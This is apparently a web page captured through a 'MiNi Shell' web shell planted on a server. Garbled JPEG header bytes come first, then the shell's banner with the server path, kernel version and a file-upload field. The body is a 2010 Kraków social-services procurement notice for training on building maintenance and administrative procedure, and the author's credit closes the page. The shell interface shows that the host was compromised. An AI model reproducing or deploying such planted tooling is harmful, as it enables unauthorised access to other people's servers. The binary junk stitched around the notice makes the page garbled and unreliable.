JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100218/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100218/34163-N-2010.html

<p class="kh_header"><b>Kraków: Przeprowadzenie szkolenia z zakresu  obowiązków związanych z utrzymaniem przez administrację publiczną obiektów budowlanych w należytym stanie techniczno-użytkowym oraz z zakresu Kodeksu Postępowania Administracyjnego po nowelizacji Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne</b><br>
<b>Numer ogłoszenia: 34163 - 2010; data zamieszczenia: 18.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkolenia z zakresu  obowiązków związanych z utrzymaniem przez administrację publiczną obiektów budowlanych w należytym stanie techniczno-użytkowym oraz z zakresu Kodeksu Postępowania Administracyjnego po nowelizacji Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1)	I część zamówienia: przeprowadzenie szkolenia dla 1 osoby z zakresu  obowiązków związanych z utrzymaniem przez administrację publiczną obiektów budowlanych w należytym stanie techniczno-użytkowym, o następującej tematyce:
a.	Forma, w jakiej organ założycielski - właściciel obiektów budowlanych zobowiązał zarządcę, użytkownika (korzystającego z obiektów) do wykonywania obowiązków, określonych w rozdziale 6 Prawa budowlanego.
b.	Określenie kompetencji dotyczących wykonywania obowiązków z zakresu utrzymania obiektów.
c.	Poddawanie budynków i innych obiektów w czasie ich użytkowania okresowej kontroli.
d.	Poddawanie obiektów budowlanych kontroli bezpiecznego ich użytkowania.
e.	Prowadzenie kontroli, o których mowa w art. 62 ust. 1, z zastrzeżeniem ust. 5 i 6 Prawa budowlanego, przez osoby posiadające uprawnienia budowlane w odpowiedniej specjalności.
f.	Dokonywanie okresowych kontroli stanu technicznego instalacji elektrycznych, piorunochronnych i gazowych przez osoby posiadające wymagane kwalifikacje.
g.	Prowadzenie kontroli przewodów dymowych oraz grawitacyjnych przewodów spalinowych i wentylacyjnych, podczas kontroli okresowych.
h.	Wykonywanie okresowej kontroli rocznej kominów przemysłowych, kominów wolnostojących oraz kominów lub przewodów kominowych, w których ciąg kominowy jest wymuszony pracą urządzeń mechanicznych.
i.	Przechowywanie dokumentacji budowy, dokumentacji powykonawczej oraz innych dokumentów i decyzji dotyczących obiektu, a także, w razie potrzeby, instrukcji obsługi i eksploatacji: obiektu, instalacji i urządzeń związanych z tym obiektem. Przechowywanie opracowań projektowych i dokumentów technicznych robót budowlanych wykonywanych w obiekcie w toku jego użytkowania.
j.	Zakładanie i prowadzenie książek obiektu budowlanego:
	dołączanie do książek obiektów budowlanych protokołów z kontroli obiektu budowlanego, ocen i ekspertyz dotyczących jego stanu technicznego oraz dokumentów.,
	prawidłowość prowadzenia książek obiektów budowlanych,
k.	Usuwanie stwierdzonych podczas kontroli stanu technicznego obiektu budowlanego uszkodzeń i uzupełnianie braków, które mogą spowodować zagrożenie życia lub zdrowia ludzi, bezpieczeństwa mienia lub środowiska, a w szczególności katastrofę budowlaną pożar, wybuch, porażenie prądem elektrycznym albo zatrucie gazem.
l.	Zmiana sposobu użytkowania obiektu budowlanego.
m.	Zgłaszanie do organu administracji architektoniczno-budowlanej robót remontowych.
n.	Zapewnienie osobom niepełnosprawnym możliwości komunikacji w obiektach użyteczności publicznej.

2)	II część zamówienia: przeprowadzenie szkolenia dla 3 osób z zakresu Kodeksu Postępowania Administracyjnego po nowelizacji Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, o następującej tematyce:
a.	Zasady ogólne postępowania administracyjnego (w tym zasada nakazująca załatwiać sprawy w formie pisemnej lub w formie dokumentu elektronicznego).
b.	Właściwość organu administracji publicznej: rzeczowa, miejscowa, instancyjna, delegacyjna.	
c.	Instytucja wyłączenia pracownika organu administrującego i organu administrującego 
od załatwienia sprawy: z mocy prawa, na mocy postanowienia, od załatwienia sprawy i od udziału w postępowaniu; przesłanki i skutki wyłączenia.
d.	Strona postępowania:
	pojęcie strony, kryterium interesu prawnego;
	zdolność prawna i zdolność do czynności prawnych;        
	przedstawiciel ustawowy;
	pełnomocnik strony, wymagania formalne pełnomocnictwa;	
	podmioty na prawach strony w postępowaniu administracyjnym.
e.	Wszczęcie postępowania (z urzędu; na wniosek):
	wymogi formalne podania;
	wymogi formalne podania wnoszonego drogą elektroniczną
	pozostawienie podania bez rozpoznania;
	przekazanie podania według właściwości.
f.	Terminy w postępowaniu administracyjnym:
	terminy maksymalne do załatwienia sprawy przez organ I instancji;
	zażalenie na niezałatwienie sprawy w terminie;
	terminy zawite i prekluzyjne dla stron i uczestników postępowania;
	instytucja przywrócenia terminu.
g.	Problematyka czynności materialno-technicznych:
	doręczenia: właściwe, zastępcze, konkludentne; doręczanie pism za pomocą środków komunikacji elektronicznej, doręczanie dokumentów w formie dokumentów elektronicznych;
	protokoły;
	udostępnianie akt stronom postępowania;
	dostęp do dokumentów elektronicznych;
	wydawanie zaświadczeń.
h.	Postępowanie wyjaśniające:
	zasada prawdy obiektywnej;
	obowiązki ciążące na organie administrującym;
	domniemania prawne i faktyczne; fakty notoryjne;
	świadek; wyjaśnienia strony;
	oględziny i kontrole oraz ich protokołowanie;
	zasada czynnego udziału strony w postępowaniu administracyjnym.
i.	Przeszkody trwałe i przemijające w prowadzeniu postępowania administracyjnego: zawieszenie postępowania; umorzenie postępowania. 
j.	Decyzja administracyjna i jej elementy:
	składniki obligatoryjne decyzji;
	uzasadnienie faktyczne i prawne;
	podpis osoby upoważnionej do wydania decyzji w tym bezpieczny podpis elektroniczny;
	składniki fakultatywne decyzji;
	uzupełnienie decyzji, sprostowanie oczywistej omyłki, wyjaśnienie treści decyzji.
k.	Postanowienia w postępowaniu administracyjnym:
	postanowienia zaskarżalne i nie zaskarżalne;
	opatrywanie postanowień bezpiecznym podpisem elektronicznym.
l.	Postępowanie odwoławcze:
obowiązki i uprawnienia organu I instancji;
odwołanie; wymogi formalne, termin, dopuszczalność odwołania, opłaty;
decyzje organu odwoławczego;
zażalenia.
m.	Zawiadomienie o sposobie załatwienia skargi bądź wniosku sporządzone w formie dokumentu elektronicznego.

2.	Warunki płatności: przelewem w terminie do 14 dni od daty przyjęcia faktury przez Zamawiającego.

3.	Warunki dodatkowe: 
1)	Zamawiający wymaga, aby szkolenia odbyły się w granicach administracyjnych Krakowa w wymiarze 6 godzin zegarowych.
2)	Nie dopuszcza się podzlecenia realizacji przedmiotu zamówienia w jakiejkolwiek części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnienia do wykonywania określonej działalności lub czynności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca przedstawił odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający uprawnienia Wykonawcy do prowadzenia usług szkoleniowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?id=9652<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2010 godzina 10:00, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkolenia z zakresu  obowiązków związanych z utrzymaniem przez administrację publiczną obiektów budowlanych w należytym stanie techniczno-użytkowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	przeprowadzenie szkolenia dla 1 osoby z zakresu  obowiązków związanych z utrzymaniem przez administrację publiczną obiektów budowlanych w należytym stanie techniczno-użytkowym, o następującej tematyce:
a.	Forma, w jakiej organ założycielski - właściciel obiektów budowlanych zobowiązał zarządcę, użytkownika (korzystającego z obiektów) do wykonywania obowiązków, określonych w rozdziale 6 Prawa budowlanego.
b.	Określenie kompetencji dotyczących wykonywania obowiązków z zakresu utrzymania obiektów.
c.	Poddawanie budynków i innych obiektów w czasie ich użytkowania okresowej kontroli.
d.	Poddawanie obiektów budowlanych kontroli bezpiecznego ich użytkowania.
e.	Prowadzenie kontroli, o których mowa w art. 62 ust. 1, z zastrzeżeniem ust. 5 i 6 Prawa budowlanego, przez osoby posiadające uprawnienia budowlane w odpowiedniej specjalności.
f.	Dokonywanie okresowych kontroli stanu technicznego instalacji elektrycznych, piorunochronnych i gazowych przez osoby posiadające wymagane kwalifikacje.
g.	Prowadzenie kontroli przewodów dymowych oraz grawitacyjnych przewodów spalinowych i wentylacyjnych, podczas kontroli okresowych.
h.	Wykonywanie okresowej kontroli rocznej kominów przemysłowych, kominów wolnostojących oraz kominów lub przewodów kominowych, w których ciąg kominowy jest wymuszony pracą urządzeń mechanicznych.
i.	Przechowywanie dokumentacji budowy, dokumentacji powykonawczej oraz innych dokumentów i decyzji dotyczących obiektu, a także, w razie potrzeby, instrukcji obsługi i eksploatacji: obiektu, instalacji i urządzeń związanych z tym obiektem. Przechowywanie opracowań projektowych i dokumentów technicznych robót budowlanych wykonywanych w obiekcie w toku jego użytkowania.
j.	Zakładanie i prowadzenie książek obiektu budowlanego:
dołączanie do książek obiektów budowlanych protokołów z kontroli obiektu budowlanego, ocen i ekspertyz dotyczących jego stanu technicznego oraz dokumentów.,
prawidłowość prowadzenia książek obiektów budowlanych,
k.	Usuwanie stwierdzonych podczas kontroli stanu technicznego obiektu budowlanego uszkodzeń i uzupełnianie braków, które mogą spowodować zagrożenie życia lub zdrowia ludzi, bezpieczeństwa mienia lub środowiska, a w szczególności katastrofę budowlaną pożar, wybuch, porażenie prądem elektrycznym albo zatrucie gazem.
l.	Zmiana sposobu użytkowania obiektu budowlanego.
m.	Zgłaszanie do organu administracji architektoniczno-budowlanej robót remontowych.
n.	Zapewnienie osobom niepełnosprawnym możliwości komunikacji w obiektach użyteczności publicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia dla 3 osób z zakresu Kodeksu Postępowania Administracyjnego po nowelizacji Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	przeprowadzenie szkolenia dla 3 osób z zakresu Kodeksu Postępowania Administracyjnego po nowelizacji Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, o następującej tematyce:
a.	Zasady ogólne postępowania administracyjnego (w tym zasada nakazująca załatwiać sprawy w formie pisemnej lub w formie dokumentu elektronicznego).
b.	Właściwość organu administracji publicznej: rzeczowa, miejscowa, instancyjna, delegacyjna.	
c.	Instytucja wyłączenia pracownika organu administrującego i organu administrującego 
od załatwienia sprawy: z mocy prawa, na mocy postanowienia, od załatwienia sprawy i od udziału w postępowaniu; przesłanki i skutki wyłączenia.
d.	Strona postępowania:
pojęcie strony, kryterium interesu prawnego;
zdolność prawna i zdolność do czynności prawnych;        
przedstawiciel ustawowy;
pełnomocnik strony, wymagania formalne pełnomocnictwa;	
podmioty na prawach strony w postępowaniu administracyjnym.
e.	Wszczęcie postępowania (z urzędu; na wniosek):
wymogi formalne podania;
wymogi formalne podania wnoszonego drogą elektroniczną
pozostawienie podania bez rozpoznania;
przekazanie podania według właściwości.
f.	Terminy w postępowaniu administracyjnym:
terminy maksymalne do załatwienia sprawy przez organ I instancji;
zażalenie na niezałatwienie sprawy w terminie;
terminy zawite i prekluzyjne dla stron i uczestników postępowania;
instytucja przywrócenia terminu.
g.	Problematyka czynności materialno-technicznych:
doręczenia: właściwe, zastępcze, konkludentne; doręczanie pism za pomocą środków komunikacji elektronicznej, doręczanie dokumentów w formie dokumentów elektronicznych;
protokoły;
udostępnianie akt stronom postępowania;
dostęp do dokumentów elektronicznych;
wydawanie zaświadczeń.
h.	Postępowanie wyjaśniające:
zasada prawdy obiektywnej;
obowiązki ciążące na organie administrującym;
domniemania prawne i faktyczne; fakty notoryjne;
świadek; wyjaśnienia strony;
oględziny i kontrole oraz ich protokołowanie;
zasada czynnego udziału strony w postępowaniu administracyjnym.
i.	Przeszkody trwałe i przemijające w prowadzeniu postępowania administracyjnego: zawieszenie postępowania; umorzenie postępowania. 
j.	Decyzja administracyjna i jej elementy:
składniki obligatoryjne decyzji;
uzasadnienie faktyczne i prawne;
podpis osoby upoważnionej do wydania decyzji w tym bezpieczny podpis elektroniczny;
składniki fakultatywne decyzji;
uzupełnienie decyzji, sprostowanie oczywistej omyłki, wyjaśnienie treści decyzji.
k.	Postanowienia w postępowaniu administracyjnym:
postanowienia zaskarżalne i nie zaskarżalne;
opatrywanie postanowień bezpiecznym podpisem elektronicznym.
l.	Postępowanie odwoławcze:
obowiązki i uprawnienia organu I instancji;
odwołanie; wymogi formalne, termin, dopuszczalność odwołania, opłaty;
decyzje organu odwoławczego;
zażalenia.
m.	Zawiadomienie o sposobie załatwienia skargi bądź wniosku sporządzone w formie dokumentu elektronicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com